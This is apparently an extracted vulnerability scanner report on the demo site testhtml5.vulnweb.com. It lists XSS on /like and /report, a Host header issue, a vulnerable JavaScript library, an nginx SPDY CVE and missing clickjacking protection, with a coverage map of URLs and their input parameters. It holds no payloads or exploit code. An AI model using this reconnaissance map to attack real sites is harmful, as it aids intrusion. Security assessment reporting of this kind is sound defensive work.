/like
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.
This alert belongs to the following categories: A3
CVSS Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CWE CWE-79
Parameter Variations
1
id 1
Host header attack
In many cases, developers are trusting the HTTP Host header value and using it to generate links, import scripts andeven generate password resets links with its value. This is a very bad idea, because the HTTP Host header can becontrolled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels likepassword reset emails.
This alert belongs to the following categories: A6, A7
CVSS Base Score: 2.6 - Access Vector: Local- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CWE CWE-20
Parameter Variations
1
24
/report
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.
This alert belongs to the following categories: A3
CVSS Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CWE CWE-79
Parameter Variations
1
id 1
/static/app/libs/sessvars.js
Vulnerable Javascript library
You are using a vulnerable Javascript library. One or more vulnerabilities were reported for this version of the Javascriptlibrary. Consult Attack details and Web References for more information about the affected library and the vulnerabilitiesthat were reported.
This alert belongs to the following categories: A9
CVSS Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CWE CWE-16
Parameter Variations
1
25
/static/app/services
Possible sensitive directories
A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks forcommon sensitive resources like backup directories, database dumps, administration pages, temporary directories. Eachone of these directories could help an attacker to learn more about his target.
This alert belongs to the following categories: A6
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Parameter Variations
1
localhost
Possible virtual host found
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server(or pool of servers). This allows one server to share its resources, such as memory and processor cycles, withoutrequiring all services provided to use the same host name. This web server is responding differently when the Host header is manipulated and various common virtual hosts aretested. This could indicate there is a Virtual Host present.
This alert belongs to the following categories: A6
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CWE CWE-200
Parameter Variations
1
26
Web Server
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allowsremote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with thengx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy"option of the "listen" directive is used in a configuration file.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 5.1 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Parameter Variations
1
Clickjacking: X-Frame-Options header missing
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Webuser into clicking on something different from what the user perceives they are clicking on, thus potentially revealingconfidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjackingattack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowedto render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content isnot embedded into other sites.
This alert belongs to the following categories: A6, A7
CVSS Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CWE CWE-693
Parameter Variations
1
OPTIONS method is enabled
HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that aresupported by the web server, it represents a request for information about the communication options available on therequest/response chain identified by the Request-URI.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
27
CWE CWE-200
Parameter Variations
1
28
Scanned items (coverage report)
http://testhtml5.vulnweb.com/
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
/ Path Fragment
Input scheme 2
Input name Input type
Host HTTP Header
http://testhtml5.vulnweb.com:80/login
No vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
password URL encoded POST
username URL encoded POST
http://testhtml5.vulnweb.com/static
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/img/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/css/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/css/style.css
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/
Vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/app.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/libs/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/libs/sessvars.js
Vulnerabilities have been identified for this URL
No input(s) found for this URL
29
http://testhtml5.vulnweb.com/static/app/post.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/controllers/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/controllers/controllers.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/services/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/services/itemsService.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/popular.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/latest.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/carousel.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/archive.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/about.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/contact.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/redir.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
30
http://testhtml5.vulnweb.com/static/scr/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/logout
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/ajax
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/ajax/popular
No vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
offset URL encoded GET
http://testhtml5.vulnweb.com/ajax/latest
No vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
offset URL encoded GET
http://testhtml5.vulnweb.com/ajax/archive
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/forgotpw
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
text/xml Custom POST
forgot.username#text XML
http://testhtml5.vulnweb.com/like
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
http://testhtml5.vulnweb.com/comment
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
31
Input scheme 1
Input name Input type
id URL encoded GET
http://testhtml5.vulnweb.com/report
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
http://testhtml5.vulnweb.com/admin/
Vulnerabilities have been identified for this URL
No input(s) found for this URL
32